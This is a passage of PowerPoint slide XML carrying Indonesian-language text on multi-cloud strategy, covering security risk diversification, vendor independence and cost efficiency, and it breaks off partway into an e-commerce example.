              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendiversifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemandirian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beradaptasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pasar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persaingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguntungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penawaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi multi-cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform e-commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optimalisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
